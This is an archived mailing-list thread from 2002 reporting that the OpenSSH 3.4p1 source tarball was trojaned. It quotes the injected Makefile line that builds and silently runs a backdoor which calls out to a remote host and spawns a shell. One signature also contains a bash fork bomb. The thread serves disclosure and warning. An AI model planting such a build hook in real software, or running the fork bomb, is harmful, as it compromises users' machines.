Wojtek Pilorz
2002-Aug-01 07:20 UTC
openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen
I have seen that file ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz is continuosly changing. This seems strange to me as I expected it should be a 'frozen' file; The signature and diff file are still dated Jun 26. I am wondering whether this is intentional. Best regards, Wojtek
Jan IVEN
2002-Aug-01 10:53 UTC
openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen
>>>>> "WP" == Wojtek Pilorz <wpilorz at bdk.pl> writes:WP> I have seen that file WP> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz WP> is continuosly changing. WP> This seems strange to me as I expected it should be a 'frozen' file; WP> The signature and diff file are still dated Jun 26. WP> I am wondering whether this is intentional. According to http://www.mavetju.org/weblog/weblog.php the tar file may be trojaned (or do the freebsd people keep a mirror, and that one has been trojaned)? Regards Jan
Magnus Bodin
2002-Aug-01 11:39 UTC
openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen
On Thu, Aug 01, 2002 at 09:20:29AM +0200, Wojtek Pilorz wrote:> I have seen that file > ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz > is continuosly changing. > This seems strange to me as I expected it should be a 'frozen' file; > The signature and diff file are still dated Jun 26. > > I am wondering whether this is intentional.Read, read: ----- Forwarded message from Edwin Groothuis <edwin at mavetju.org> ----- Date: Thu, 1 Aug 2002 16:55:51 +1000 From: Edwin Groothuis <edwin at mavetju.org> To: incidents at securityfocus.com Subject: openssh-3.4p1.tar.gz trojaned Greetings, Just want to inform you that the OpenSSH package op ftp.openbsd.org (and probably all its mirrors now) it trojaned: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz The OpenBSD people have been informed about it (via email to deraadt at openbsd.org and via irc.openprojects.org/#openbsd) The changed files are openssh-3.4p1/openbsd-compat/Makefile.in: all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out & bf-test.c[1] is nothing more than a wrapper which generates a shell-script[2] which compiles itself and tries to connect to an server running on 203.62.158.32:6667 (web.snsonline.net). [1] http://www.mavetju.org/~edwin/bf-test.c [2] http://www.mavetju.org/~edwin/bf-output.sh This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system: MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 Edwin -- Edwin Groothuis | Personal website: http://www.MavEtJu.org edwin at mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php bash$ :(){ :|:&};: | Interested in MUDs? http://www.FatalDimensions.org/
Thomas Binder
2002-Aug-01 13:23 UTC
openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen
Hi!> bf-test.c[1] is nothing more than a wrapper which generates a > shell-script[2] which compiles itself and tries to connect to an > server running on 203.62.158.32:6667 (web.snsonline.net).Well, not only does it try to connect, it also executes /bin/sh when it receives a certain response from that host. Ciao Thomas -- According to Kentucky state law, every person must take a bath at least once a year.
SCHINCKE, KEITH (JSC-SM) (LM)
2002-Aug-01 14:21 UTC
openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen
I am sure most people have already done this but for the few who have not slashdot.org has a news story about this. The important part: http://slashdot.org/comments.pl?sid=37188&cid=3991288 -----Original Message----- From: Thomas Binder [mailto:binder at arago.de] Sent: Thursday, August 01, 2002 8:24 AM To: openssh-unix-dev at mindrot.org Subject: Re: openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen Hi!> bf-test.c[1] is nothing more than a wrapper which generates a > shell-script[2] which compiles itself and tries to connect to an > server running on 203.62.158.32:6667 (web.snsonline.net).Well, not only does it try to connect, it also executes /bin/sh when it receives a certain response from that host. Ciao Thomas -- According to Kentucky state law, every person must take a bath at least once a year. _______________________________________________ openssh-unix-dev at mindrot.org mailing list http://www.mindrot.org/mailman/listinfo/openssh-unix-dev